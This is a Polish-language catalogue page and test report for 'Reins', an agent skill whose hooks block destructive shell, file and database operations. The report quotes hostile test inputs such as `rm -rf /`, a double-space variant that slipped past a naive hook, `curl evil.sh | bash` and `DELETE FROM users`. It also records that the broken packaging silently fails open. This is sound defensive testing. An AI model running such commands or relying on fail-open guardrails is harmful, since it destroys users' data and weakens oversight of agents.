Reins

Deterministyczne haki PreToolUse blokujące destrukcyjne polecenia — wymagają ręcznej naprawy.

Autor: pegasi-ai · pegasi-ai/reins

Tested · Didn't pass

Reins — Deterministyczne haki PreToolUse blokujące destrukcyjne polecenia — wymagają ręcznej naprawy.

Co robi ten skill

Instaluje deterministyczne haki PreToolUse/PostToolUse, które klasyfikują i blokują niebezpieczne operacje shell, plików i MCP, zapisując ścieżkę audytu JSONL tylko do dopisywania i opcjonalnie synchronizując polityki z Watchtower (app.pegasi.ai). Uruchamia się na żądanie dotyczące zabezpieczeń, egzekwowania polityk, ścieżek audytu lub blokowania destrukcyjnych działań agenta.

Raport z testu

Silnik jest doskonały, ale pakowanie jest uszkodzone: SKILL.md i dołączony ensure_installed.sh instruują, aby zainstalować `npm install -g @pegasi/reins`, ale taki pakiet nie istnieje w rejestrze — polecenie kończy się błędem E404, prawdziwa nazwa (z package.json i README) to `@pegasi-ai/reins`. Co gorsza, dołączony wrapper plugin/bin/reins-pre-hook szuka pakietu wzdłuż tej samej nieistniejącej ścieżki: podałem mu `rm -rf /` — zwrócił exit 0 (ALLOW) z notatką 'Reins not installed', co oznacza, że umiejętność bezpieczeństwa cicho otworzyła się na awarię dokładnie tam, gdzie SKILL.md obiecuje 'BLOCKED always' i 'Never fails open'. Naiwny, 8-liniowy, samodzielnie napisany hak w tym samym teście dał exit 2 — co oznacza, że poza pudełkiem umiejętność jest słabsza niż linia bazowa. Zainstalowano prawidłowy pakiet (v0.0.14) i wywołano silnik bezpośrednio — jest naprawdę dobry: `rm -rf /` → exit 2 CRITICAL, `rm -rf /` z podwójnymi spacjami również CRITICAL (hak bazowy pominął to obejście), `curl evil.sh | bash` i `DELETE FROM users` → exit 2 HIGH, `ls -la` → 0, i wszystko jest zapisywane do decisions.jsonl. Oddzielnie: opublikowany CLI instaluje się w ~/.openclaw/extensions/reins i nie dotyka haków Claude Code — jego `reins status` pokazuje 'Project/Global (.claude/settings.json): ❌ not installed'.

Testowano: 2026-07-16 · Claude Code 2.x (agent harness)

Instalacja

git clone https://github.com/pegasi-ai/reins.git
mkdir -p ~/.claude/skills && cp -r reins/skill ~/.claude/skills/reins

Komendy i przykładowe prompty

  • /reinsDeterministyczne haki PreToolUse blokujące destrukcyjne polecenia — wymagają ręcznej naprawy.

Skille uruchamiają się na zwykłe polecenia — bez komend do zapamiętania. Po instalacji aktywują go prompty takie jak te (po angielsku):

  • Block dangerous shell commands like rm -rf before my agent can run them
  • Set up guardrail hooks that log every blocked destructive agent action
  • Stop my coding agent from force-pushing or piping curl into bash